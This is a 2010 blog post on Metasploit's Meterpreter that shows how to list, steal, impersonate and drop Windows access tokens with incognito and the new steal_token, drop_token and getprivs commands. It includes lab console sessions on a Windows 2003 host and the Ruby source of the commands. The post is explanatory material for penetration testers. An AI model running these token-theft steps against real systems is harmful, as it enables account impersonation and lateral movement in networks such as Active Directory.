Meterpreter Token Manipulation
Friday, January 1, 2010 at 11:33PM
Carlos Perez

In revision 8055 HD committed new code that now allows the Meterpreter session if running as System to manipulate tokens in a much easier manner. Just like with incognito one can now get an access token and impersonate an account thru the Meterpreter Standard API, in fact I see both as complementing each other. Lets impersonate the Local Admin account on a Windows 2003 System using Incognito:

  1: meterpreter > use incognito
  2: Loading extension incognito...success.
  3: meterpreter > list_tokens -u
  4: 
  5: Delegation Tokens Available
  6: ========================================
  7: NT AUTHORITY\LOCAL SERVICE
  8: NT AUTHORITY\NETWORK SERVICE
  9: NT AUTHORITY\SYSTEM
 10: WIN2K3LAB01\Administrator
 11: 
 12: Impersonation Tokens Available
 13: ========================================
 14: NT AUTHORITY\ANONYMOUS LOGON

From line 1 and 2 we can see that we have loaded the incognito extension, this will inject a DLL in to the process where Meterpreter is running to allow us to issue the commands. At line 3 we issue a command to list the tokens available to the attacker, System is the best privilege to have while executing this command since we will see all token on the host, if we are not running as System on the target machine we will only see those tokens that the account have used to connect to other systems with.  Now we will change from our current running User ID to the Local Admin using incognito:

  1: meterpreter > getuid 
  2: Server username: NT AUTHORITY\SYSTEM
  3: meterpreter > impersonate_token WIN2K3LAB01\\Administrator
  4: [+] Delegation token available
  5: [+] Successfully impersonated user WIN2K3LAB01\Administrator
  6: meterpreter > getuid 
  7: Server username: WIN2K3LAB01\Administrator

Now we have moved from System to Local Admin, this process is very useful for when attacking distributed system like Microsoft Active Directory where having local access only is not of great benefit but being able to move to the credentials for that system specially administrative credentials are of great value.

The new commands in Standard API are:

The following code map to the following code in lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

  1: #
  2: # Obtains as many privileges as possible on the target machine.
  3: #
  4: def cmd_getprivs(*args)	
  5: 	print_line("=" * 60)
  6: 	print_line("Enabled Process Privileges")
  7: 	print_line("=" * 60)
  8: 	client.sys.config.getprivs.each do |priv|
  9: 		print_line("  #{priv}")
 10: 	end
 11: 	print_line("")
 12: end
 13: 
 14: #
 15: # Tries to steal the primary token from the target process.
 16: #
 17: 
 18: def cmd_steal_token(*args)	
 19: 	if(args.length != 1 or args[0] == "-h")
 20: 		print_error("Usage: steal_token [pid]")
 21: 		return
 22: 	end
 23: 	print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
 24: end
 25: 
 26: #
 27: # Drops any assumed token.
 28: #
 29: 
 30: def cmd_drop_token(*args)	
 31: 	print_line("Relinquished token, now running as: " + client.sys.config.drop_token())	
 32: end

The drop_token command executes the function cmd_drop_token that as it can be seen in line 31 it will execute the API call client.sys.config.drop_token. The getprivs command execute sthe cmd_getprivs function that in turn executes the client.sys.config.getprivs API call which returns an Array of all the privileges the current user has. The steal_token command executes the cmd_steal_token function that in turn executes the client.sys.config.steal_token API call taking as required argument the PID of the process from whom to steal the token from if possible. As it can be seen 3 simple API calls from inside a Meterpreter session is all it takes, this makes scripting this actions for other scripts extremely easy and sets this framework apart from others.

Lets Impersonate a toke that we know runs under the Administrators Account like the process of explorer.exe for a logged on account. We will list the processes, steal its token, check our privileges and then drop the token.:

  1: meterpreter > ps
  2: 
  3: Process list
  4: ============
  5: 
  6:     PID   Name                 Path
  7:     ---   ----                 ----
  8:     268   smss.exe             \SystemRoot\System32\smss.exe
  9:     320   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
 10:     344   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
 11:     392   services.exe         C:\WINDOWS\system32\services.exe
 12:     404   lsass.exe            C:\WINDOWS\system32\lsass.exe
 13:     600   vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 14:     620   svchost.exe          C:\WINDOWS\system32\svchost.exe
 15:     700   svchost.exe          C:\WINDOWS\system32\svchost.exe
 16:     756   svchost.exe          C:\WINDOWS\system32\svchost.exe
 17:     784   svchost.exe          C:\WINDOWS\system32\svchost.exe
 18:     820   svchost.exe          C:\WINDOWS\System32\svchost.exe
 19:     964   spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
 20:     992   msdtc.exe            C:\WINDOWS\system32\msdtc.exe
 21:     1104  dns.exe              C:\WINDOWS\System32\dns.exe
 22:     1152  svchost.exe          C:\WINDOWS\System32\svchost.exe
 23:     1216  svchost.exe          C:\WINDOWS\system32\svchost.exe
 24:     1296  vmtoolsd.exe         C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 25:     1368  VMUpgradeHelper.exe  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 26:     1488  wmiprvse.exe         C:\WINDOWS\system32\wbem\wmiprvse.exe
 27:     1560  svchost.exe          C:\WINDOWS\System32\svchost.exe
 28:     1704  dllhost.exe          C:\WINDOWS\system32\dllhost.exe
 29:     2164  Explorer.EXE         C:\WINDOWS\Explorer.EXE
 30:     2228  VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 31:     2236  VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 32:     2284  meter_224.exe        C:\Documents and Settings\Administrator\Desktop\meter_224.exe
 33:     2352  wuauclt.exe          C:\WINDOWS\system32\wuauclt.exe
 34:     2484  wmiprvse.exe         C:\WINDOWS\system32\wbem\wmiprvse.exe
 35:     3076  svhost77.exe         C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe
 36:     3096  taskmgr.exe          C:\WINDOWS\system32\taskmgr.exe
 37: meterpreter > steal_token 2164
 38: Stolen token with username: WIN2K3LAB01\Administrator
 39: meterpreter > getuid 
 40: Server username: WIN2K3LAB01\Administrator
 41: meterpreter > drop_token 
 42: Relinquished token, now running as: NT AUTHORITY\SYSTEM

We first executed the ps command to list all processes with the PID, we used the steal_token command in like 37 to steal the token for the explorer process that has the PID of 2164 and we confirm in line 39 with the getuid command that we are now running under that token, at line 41 we drop the token and return to run as System. The drop command is also useful for when impersonating a token using incongnito and we want to return.

The getprivs command will list all of the Windows System Process Level Privileges that are enabled:

  1: meterpreter > getprivs 
  2: ============================================================
  3: Enabled Process Privileges
  4: ============================================================
  5:   SeDebugPrivilege
  6:   SeTcbPrivilege
  7:   SeAssignPrimaryTokenPrivilege
  8:   SeLockMemoryPrivilege
  9:   SeIncreaseQuotaPrivilege
 10:   SeSecurityPrivilege
 11:   SeTakeOwnershipPrivilege
 12:   SeLoadDriverPrivilege
 13:   SeSystemtimePrivilege
 14:   SeProfileSingleProcessPrivilege
 15:   SeIncreaseBasePriorityPrivilege
 16:   SeCreatePagefilePrivilege
 17:   SeCreatePermanentPrivilege
 18:   SeBackupPrivilege
 19:   SeRestorePrivilege
 20:   SeShutdownPrivilege
 21:   SeAuditPrivilege
 22:   SeSystemEnvironmentPrivilege
 23:   SeChangeNotifyPrivilege
 24:   SeUndockPrivilege
 25:   SeManageVolumePrivilege

As it can be seen the improvements on the Meterpreter ar being expanded and making it the best payload to be used against Windows System available in Metasploit. This new combination of token handling mixed with incognito and the ease in whish it can be scripted expands on the flexibility of Meterpreter and what can be done with it.

Article originally appeared on Security and Networking (http://darkoperator.squarespace.com/).
See website for complete article licensing information.